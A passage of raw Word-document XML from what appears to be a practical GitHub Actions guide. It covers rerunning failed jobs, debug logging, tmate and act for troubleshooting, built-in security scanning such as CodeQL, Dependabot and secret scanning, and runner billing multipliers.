        </w:rPr>
        <w:t xml:space="preserve"> — skips the green jobs, retries the red ones, keeps the successful jobs' artifacts. Usually what you want.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">From the CLI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">gh run rerun &lt;run-id&gt; --failed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Turning on verbose logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Two repo secrets unlock noisy-but-useful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Secret</w:t>
            </w:r>
          </w:p>
        </w:tc>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Effect</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ACTIONS_STEP_DEBUG=true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Shows step-level setup, env resolution, expression evaluation.</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ACTIONS_RUNNER_DEBUG=true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Shows runner-level network, disk, shell diagnostics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Add them at Settings → Secrets and variables → Actions. Turn them off when you're done — they make every run slower and the logs harder to read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The "what is even in my environment right now" step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste this whenever a workflow is being weird:</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Dump context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 GITHUB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"ref:    $GITHUB_REF"</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"sha:    $GITHUB_SHA"</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"actor:  $GITHUB_ACTOR"</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"event:  $GITHUB_EVENT_NAME"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echo "=== ENV ==="</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env | sort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Half the time, that alone points at the problem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH into the runner (the nuclear option)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">When nothing else works, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">tmate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> pauses the job and gives you an SSH address into the live runner:</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name: Open SSH on failure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if: failure()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uses: mxschmitt/action-tmate@v3</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timeout-minutes: 15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Use this only on private repos and private branches. Anyone with the SSH address can connect. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">timeout-minutes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a guardrail against forgotten open sessions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Iterating without pushing — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">act</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">act</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs your workflows locally in Docker, so you don't have to push a commit for every tiny change.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brew install act               # macOS (other installers on the repo)</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act                             # runs workflows triggered by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act pull_request                # simulates a PR event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act -j test                     # runs only the job named 'test'</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act -s GITHUB_TOKEN=...         # pass secrets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">One warning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">act</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> approximates GitHub-hosted runners, but doesn't replicate them exactly. Caches and some pre-installed tools differ. Use it to catch YAML errors and basic logic — not as your final verification before production.</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15. Security scanning — the stuff you shouldn't skip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub has a handful of built-in security features. Most are free, most are easy to turn on, and most teams leave them off because they're not aware of them. Take the ten minutes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeQL — static analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Finds common vulnerabilities (SQL injection, XSS, path traversal) by analyzing your source code. Turning it on is a two-click operation at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security tab → Code scanning → Set up → Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, or if you want more control, a workflow:</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CodeQL</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push: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pull_request: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branches: [main]</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schedule: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cron: '0 0 * * 1'</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analyze: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permissions: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security-events: write</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contents: read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github/codeql-action/init@v3</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languages: javascript, python</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github/codeql-action/analyze@v3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Findings show up under the Security tab. Don't ignore them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependabot — dependency hygiene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Dependabot opens PRs that bump versions of your dependencies when there's a known CVE. Turn it on at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Settings → Code security → Dependabot alerts / security updates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">. Fine-tune with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">.github/dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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version: 2</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updates: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package-ecosystem: "npm"</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directory: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schedule:</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interval: "weekly"</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Dependency review — block risky PRs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks a PR that tries to introduce a dependency with a high-severity vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top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name: Dependency Review</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on: [pull_request]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jobs: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review:</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runs-on: ubuntu-latest</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permissions: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contents: read</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steps:</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actions/checkout@v4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 uses: actions/dependency-review-action@v4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>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with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DDDDDD" w:sz="4" w:space="2"/>
          <w:left w:val="single" w:color="2E75B6" w:sz="24" w:space="6"/>
          <w:right w:val="single" w:color="DDDDDD" w:sz="4" w:space="2"/>
        </w:pBdr>
        <w:shd w:fill="F4F4F4" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">          fail-on-severity: high</w:t>
      </w:r>
    </w:p>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Secret scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This one is built in — no workflow needed. GitHub scans every push for secret patterns it knows (AWS keys, Stripe tokens, GCP service accounts, a few hundred others) and alerts the repo owner. Turn on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">push protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Settings → Code security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and GitHub will reject the push itself before the secret even lands in history. Turn it on. Every repo.</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16. Billing, minutes, and how not to burn through them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Actions is free for public repos. Truly, genuinely free, no cap. For private repos, minutes are metered — and it's easy to eat through them without realizing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The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Plan</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Free minutes per month</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Free storage</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Free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2,000</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500 MB</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Pro / Team</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3,000</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1 GB</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Enterprise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50,000</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50 GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Public repos get unlimited minutes. The numbers above are private repos only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The cost multipliers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Each runner OS bills at a different rate, and this is where people get caught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Runner</w:t>
            </w:r>
          </w:p>
        </w:tc>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Multiplier</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ubuntu-latest</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1×</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windows-latest</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2×</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macos-latest</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10×</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Larger runners</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2–16× depending on tier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">A 10-minute macOS job eats 100 minutes of your quota. Ubuntu is the default for a reason — use macOS only when you're building or testing something Mac-specific.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep an eye on it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Settings → Billing and plans → Usage this month. Worth checking monthly, especially after adding a scheduled workflow (those run whether you're looking or not).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ways to spend less</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cancel redundant runs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">concurrency: { cancel-in-progress: true }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> stops older runs when a new push lands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cache dependencies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — saves 1–3 minutes per job. Huge win.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Path filters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — skip workflows that don't care about the files that changed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Matrix `include`/`exclude`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — test only the combinations you actually care about.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Prefer Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 10× cheaper than macOS, 2× cheaper than Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Set `timeout-minutes`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> — stops a runaway loop from eating hours:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="60" w:line="320" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
